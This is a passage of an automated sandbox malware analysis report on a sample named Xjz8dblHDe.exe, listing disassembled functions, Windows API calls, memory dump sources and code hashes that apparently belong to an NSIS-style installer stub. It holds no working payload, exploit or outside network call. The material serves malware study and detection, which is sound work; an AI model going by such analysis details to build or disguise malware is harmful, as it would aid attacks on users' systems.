                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                    • String ID: %ls=%ls$[Rename]
                                                                    • API String ID: 2171350718-461813615
                                                                    • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                    • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                    • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                    • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                    Function 00402DF3 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                    • MulDiv.KERNEL32(000A6C6C,00000064,000A7620), ref: 00402E3C
                                                                    • wsprintfW.USER32 ref: 00402E4C
                                                                    • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: v$ll$verifying installer: %d%%
                                                                    • API String ID: 1451636040-760928594
                                                                    • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                    • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                    • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                    • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                    Function 0040652B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                    • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                    • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: "C:\Users\user\Desktop\Xjz8dblHDe.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 589700163-2479983871
                                                                    • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                    • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                    • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                    • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                    Function 00404275 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                    • GetSysColor.USER32(00000000), ref: 004042D0
                                                                    • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                    • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                    • GetSysColor.USER32(?), ref: 004042FB
                                                                    • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                    • DeleteObject.GDI32(?), ref: 00404325
                                                                    • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                    • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                    • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                    • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                    Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                      • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                    • String ID: 9
                                                                    • API String ID: 163830602-2366072709
                                                                    • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                    • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                                                    • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                    • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                                                    Function 00404BC9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                    • GetMessagePos.USER32 ref: 00404BEC
                                                                    • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                    • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                                                    • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                    • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                                                    Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                    • GlobalFree.KERNEL32(?), ref: 00402956
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                    • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
                                                                    • Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                    • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
                                                                    Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401DBC
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                    • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID:
                                                                    • API String ID: 3808545654-0
                                                                    • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                    • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                    • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                    • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                    Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                    • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
                                                                    • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                    • Opcode Fuzzy Hash: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
                                                                    • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                    Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
